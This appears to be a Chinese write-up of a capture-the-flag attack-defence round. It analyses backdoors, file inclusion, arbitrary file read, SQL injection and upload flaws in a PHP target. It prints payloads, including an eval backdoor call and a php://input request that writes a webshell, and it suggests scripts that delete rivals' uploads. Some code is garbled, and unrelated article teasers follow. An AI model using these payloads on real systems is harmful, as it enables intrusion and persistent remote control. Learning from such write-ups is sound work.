首先拖到d盾掃瞄
可以很明顯的看出來確實就是兩個後門
0x01 index.php#一句話木馬後門
0x02 about.php#檔案包含漏洞
都可以很直觀的看出來非常明顯的漏洞,第乙個直接就是
eval
一句話後門,第二個就是非常簡單的檔案包含;
第乙個漏洞的利用**即為:system(base64_decode("y2f0igzsywcq"));
y2f0igzsywcq是cat flag*進行
base64
編碼以後的。
第二個漏洞攻擊可以通過偽協議中的input寫入
webshell
about.php?f=php://input
post資料為:
<?php fputs(fopen("shell.php","w"),'<?php eval($_post["cmd"];?>');?>
0x03 challege.php#任意檔案讀取
這裡在41行的時候有乙個判斷,如果其中乙個滿足那麼就會
exit
。所以我們不能讓她
exit
,否則不能執行
readfile
40行的函式使用的有點問題,應該是
parse_url
,多了乙個
n,提供**給我的這位師傅應該是沒有修改過**的。所以這裡應該是比賽方的乙個瑕疵。
我們當作parse_url來做
parse_url函式是拿來解析
url的,如下所示
所以在看41行的**就很簡單了
我們直接讓$parts['host']不為空並且等於
localhost
即可最終得出讀取 flag:
0x04 sql注入
因為我這裡沒有資料庫環境就不多演示如何get資料了。
如果要修復,直接對$_get[『id』]進行操作即可。
0x05 sql注入
0x06 sql注入
0x07 upload.php#任意檔案上傳
上傳成功:/images/15681026431.php
登陸後flag:(因為我這兒僅有原始碼,所以沒顯示出正確的flag,比賽環境裡在這裡應該是可以看到flag的)
0x08 sql注入 #search.php
小結:開啟index.php就可以很明顯的看到
eval
以及undefined index
:123
這裡其實就基本可以猜得到,
123這個引數是後門了。所以可以很快通過這個後門直接
getshell
拿到許可權;
上面的注入均沒有進行任何過濾,直接通過sqlmap就可以很簡單的跑出來;
拿到許可權以後,可以對**進行審計,迅速修復漏洞不讓對手入侵下這個**;
或者利用指令碼輪訓刪除images目錄下的檔案;
針對個人賽,入侵公共靶機的話,如果是可以修改**那麼就破壞功能點,如果不能修改**那就可以預先準備好一些小指令碼,例如輪訓刪除images目錄下的所有檔案。盡可能的達到自己入侵下的靶機就不要給別人入侵的機會;
網路安全知識競賽選擇題 161 200題
161.公共資訊網路安全監察工作的一般原則 abcd a 預防與打擊相結合的原則 b 專門機關監管與社會力量相結合的原則 c 糾正與制裁相結合的原則 d 教育和處罰相結合的原則 162.安全員應具備的條件 abd a 具有一定的計算機網路專業技術知識 b 經過計算機安全員培訓,並考試合格 c 具有大...
網路安全知識(一)
計算機病毒的破壞行為 計算機病毒的破壞行為主要分為四類 1 刪除 修改檔案。被開啟檔案變為乙個可執行檔案,原檔案內容被覆蓋。2 占用系統資源。絕大多數的蠕蟲病毒。瘋狂在計算機網路中傳播,占用網路以及本地計算機資源。3 非法訪問系統程序。主要以黑客病毒為主。通過感染計算機,然後黑客或非法使用者獲得對已...
網路安全基礎知識
什麼是網路安全?網路安全基礎知識有那些?網路安全問題隨著計算機技術的迅速發展日益突出,從網路執行和管理者角度說,他們希望對本地網路資訊的訪問 讀寫等操作受到保護和控制,避免出現 陷門 病毒 非法訪問 拒絕服務和網路資源非法占用和非法控制等威脅,制止和防禦網路黑客的攻擊。對安全保密部門來說,他們希望對...